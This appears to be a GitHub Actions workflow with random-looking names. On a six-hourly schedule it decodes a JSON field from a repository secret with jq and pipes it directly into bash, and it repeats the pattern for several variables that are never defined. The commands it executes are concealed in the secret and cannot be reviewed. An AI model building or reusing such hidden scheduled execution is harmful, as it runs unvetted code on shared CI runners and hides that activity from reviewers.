name: haosiwen19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '41 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: haosiwen19871010
        env:
          bddw77: ${{ secrets.bddw77 }}
        run: |
          echo $bddw77 | jq -r .v01511 | /bin/bash
          echo $n0825 | jq -r .m65110 | /bin/bash
          echo $cs690 | jq -r .saew0 | /bin/bash
          echo $cfs77 | jq -r .u99 | /bin/bash
          echo $p64369 | jq -r .gzg21 | /bin/bash
          echo $whvem3 | jq -r .awwl8 | /bin/bash

